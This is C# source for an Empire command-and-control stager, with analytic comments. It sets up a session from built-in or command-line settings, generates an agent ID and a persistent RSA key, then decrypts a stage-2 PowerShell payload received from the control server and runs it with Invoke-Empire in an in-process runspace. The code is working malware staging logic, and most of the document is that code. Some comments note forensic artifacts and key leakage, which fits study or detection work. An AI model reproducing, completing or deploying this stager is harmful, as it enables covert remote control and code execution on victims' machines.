// Entry point of the stager. Which SessionInfo constructor runs is chosen at
// build time by the COMMAND_LINE / COMPILE_TIME symbols (defining both would
// declare sessionInfo twice in one scope and fail to compile); PRINT adds
// console diagnostics. SessionInfo and EmpireStager.Execute are defined
// elsewhere and not visible here.
static void Main(string[] args)
{
#if (COMMAND_LINE)
    // Command-line build: configuration comes from argv. Fewer than three
    // arguments means a silent exit, with no usage message or error.
    if (args.Length < 3)
    {
        return;
    }
    SessionInfo sessionInfo = new SessionInfo(args);
#endif
#if (COMPILE_TIME)
    // Compile-time build: configuration is baked into the parameterless
    // SessionInfo constructor.
    SessionInfo sessionInfo = new SessionInfo();
#endif
#if (PRINT)
    // Debug output. The staging key is echoed to stdout here, so a PRINT
    // build leaves the key in any captured console output.
    Console.WriteLine("EmpireServer: {0}", sessionInfo.GetControlServers());
    Console.WriteLine("StagingKey: {0}", sessionInfo.GetStagingKey());
    Console.WriteLine("AgentLanguage: {0}", sessionInfo.GetAgentLanguage());
#endif
    // Execute() is not shown on this page; the constructor's side effects
    // (agent ID, RSA key container) happen before it is called.
    (new EmpireStager(sessionInfo)).Execute();
}
////////////////////////////////////////////////////////////////////////////////
// Constructor: caches the staging key as ASCII bytes, assigns a random
// 8-character agent ID to the session, and creates the RSA key pair used later
// in staging. The fields stagingKeyBytes and rsaCrypto are declared elsewhere
// in the class. Note that sessionInfo itself is not stored here, although
// other members read a sessionInfo field — presumably assigned elsewhere
// (not visible on this page).
////////////////////////////////////////////////////////////////////////////////
public EmpireStager(SessionInfo sessionInfo)
{
    stagingKeyBytes = Encoding.ASCII.GetBytes(sessionInfo.GetStagingKey());
    // Agent ID: 8 characters from an alphabet that omits the visually
    // ambiguous I, J, O, Q and 0. System.Random is not a cryptographic RNG, so
    // the ID is not unpredictable; the fixed length and alphabet also make the
    // ID format a recognisable pattern wherever the session ID is recorded.
    Random random = new Random();
    string characters = "ABCDEFGHKLMNPRSTUVWXYZ123456789";
    char[] charactersArray = characters.ToCharArray();
    StringBuilder sb = new StringBuilder(8);
    for (int i = 0; i < 8; i++)
    {
        int j = random.Next(charactersArray.Length);
        sb.Append(charactersArray[j]);
    }
    sessionInfo.SetAgentID(sb.ToString());
    // 2048-bit RSA key via the legacy CSP API, explicitly placed in the
    // machine-wide key store. With a CspParameters supplied, the provider
    // persists the key container by default; unless PersistKeyInCsp is cleared
    // or the container deleted elsewhere (not visible here), it remains on
    // disk in the machine key store — a durable host artifact.
    CspParameters cspParameters = new CspParameters();
    cspParameters.Flags = cspParameters.Flags | CspProviderFlags.UseMachineKeyStore;
    rsaCrypto = new RSACryptoServiceProvider(2048, cspParameters);
}
////////////////////////////////////////////////////////////////////////////////
// Decrypts the stage-2 response into PowerShell source and runs it, followed
// by an Invoke-Empire call, inside an in-process PowerShell runspace.
// aesDecrypt and the sessionInfo field are defined elsewhere in the class.
////////////////////////////////////////////////////////////////////////////////
private void PowershellEmpire(byte[] stage2Response)
{
    // The decrypted body is treated as ASCII PowerShell source and appended
    // verbatim to the pipeline below, so the full script text is what the
    // installed PowerShell engine's own logging/inspection hooks see for
    // AddScript input (coverage depends on the PowerShell version present).
    string empire = Encoding.ASCII.GetString(aesDecrypt(sessionInfo.GetSessionKey(), stage2Response));
    // Command line built by plain concatenation: values are wrapped in double
    // quotes but not escaped, so a value containing '"' would break the
    // script. Only the first control server is passed on.
    string execution = "Invoke-Empire";
    execution += " -Servers \"" + sessionInfo.GetControlServers().First() + "\"";
    execution += " -StagingKey \"" + sessionInfo.GetStagingKey() + "\"";
    execution += " -SessionKey \"" + sessionInfo.GetSessionKey() + "\"";
    execution += " -SessionID \"" + sessionInfo.GetAgentID() + "\"";
#if (PRINT)
    // Debug build prints the whole command line — staging and session keys
    // included — to stdout.
    Console.WriteLine(execution);
#endif
    // Hosts the PowerShell engine in this process via System.Management
    // .Automation rather than launching powershell.exe. Invoke() is
    // synchronous and blocks this thread until the script returns; any
    // exception propagates to the caller, and the using blocks dispose the
    // pipeline and runspace on the way out.
    using (Runspace runspace = RunspaceFactory.CreateRunspace())
    {
        runspace.Open();
        using (Pipeline pipeline = runspace.CreatePipeline())
        {
            pipeline.Commands.AddScript(empire + ";" + execution + ";");
            pipeline.Invoke();
        }
    }
}